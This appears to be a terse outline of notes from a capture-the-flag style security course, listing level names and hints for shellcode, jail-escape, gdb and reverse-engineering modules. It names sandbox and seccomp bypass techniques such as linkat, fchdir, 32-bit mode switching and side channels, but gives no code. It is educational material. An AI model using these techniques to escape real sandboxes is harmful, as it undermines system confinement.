2.emmmm

4.造一个跳板

5.禁用syscall系列

7.关闭stdio

8.限制写权限

9.被动修改

10.sort ur shellcode

12.每个byte得unique

14.只读6个字节

module 5-jail

1.exemplify

2.同第一题

3.move in

4.seccomped -> openat

5. linkat

6.fchdir

7.没有at了

8.openat read write send

9.变成32位

10.side channel communication

11.nanosleep

12.only read

13.怎么是socket??

module 6-gdb

level4

level5

level6

level 7

module 7-rev

level1.0-2.1

level3

level4

level5

level6